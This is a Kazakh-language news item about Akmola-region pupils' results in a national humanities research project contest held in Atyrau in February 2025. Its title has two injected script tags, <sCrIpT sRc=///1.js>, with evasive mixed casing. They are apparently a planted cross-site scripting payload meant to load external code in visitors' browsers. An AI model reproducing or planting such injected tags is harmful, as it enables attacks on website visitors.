Қоғамдық-гуманитарлық бағыттағы пәндер бойынша республикалық ғылыми жобалар байқауының қорытынды (республикалық) кезеңін өткізу туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.02.2025

2025 жылғы 25 - 28 ақпан аралығында Атырау қаласында 8-11 сынып оқушылары арасында қоғамдық-гуманитарлық бағыттағы пәндер бойынша республикалық ғылыми жобалар конкурсының қорытынды (республикалық) кезеңі өтті.

         Ғылыми байқаудың мақсаты-оқушылардың ғылыми-зерттеу және оқу-танымдық қызметін ынталандыру, неғұрлым талантты және дарынды жас зерттеушілерді іріктеу және қолдау, Қазақстан Республикасының зияткерлік әлеуетін қалыптастыруға жәрдемдесу.

         Ғылыми жобаларды қорғау бір бағыт, оның ішінде 6 секция бойынша жүзеге асырылады:

«Қазақстанның тарихи ескерткіштері және перспективалы туристік маршруттар», секциялар: тарих, өлкетану, тіл білімі, әдебиет, этномәдениеттану, адам және қоғам.

Ақмола облысынан 12 жобамен 13  оқушы қатысты.

Байқаудың қорытындысы бойынша 5 оқушы жүлдегер және жеңімпаз атанды: ІІ-дәрежелі дипломмен – 1 оқушы, ІІІ-дәрежелі дипломмен – 4 оқушы, грамотамен – 2 оқушы марапатталды.

II дәрежелі дипломмен «Тіл білімі (ағылш.)» секциясы бойынша Жунусова Аружан - Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 8-сынып оқушысы марапатталды.

IІI дәрежелі дипломмен марапатталды:

1.«Әдебиет (қаз.)» секциясы бойынша Бегзан Зерде– Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 9-сынып оқушысы;

2.«Әдебиет (қаз.)» секциясы бойынша Дүйсенбек Ақерке – Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 9-сынып оқушысы;

3.«Өлкетану» секциясы бойынша Кадралинова Амина – Щучинск қаласы "Білім-инновация" IT лицей-интернатының 9-сынып оқушысы;

4.«Тіл білімі (орыс.)» секциясы бойынша Сейсен Әлима - Көкшетау қаласы, Абай атындағы дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатының 10-сынып оқушысы.

Грамотамен келесі оқушылар марапатталды:

1.«Адам және қоғам» секциясы бойынша Кустанбаев Куаныш– Бурабай ауданы, Баянбай ауылының жалпы орта білім беретін мектебінің 10-сынып оқушысы;

2.«Өлкетану» секциясы бойынша Естаева Мадина – Бурабай ауданы, Щучинск қаласының № 6 жалпы орта білім беретін мектебінің 11-сынып оқушысы.

Қоғамдық-гуманитарлық бағыттағы пәндер бойынша республикалық ғылыми жобалар байқауының жеңімпаздары мен жүлдегерлерін шын жүректен құттықтаймыз!!!

Просмотров: 628


Пікір қосу



Деректерді қолтаңбаға қосу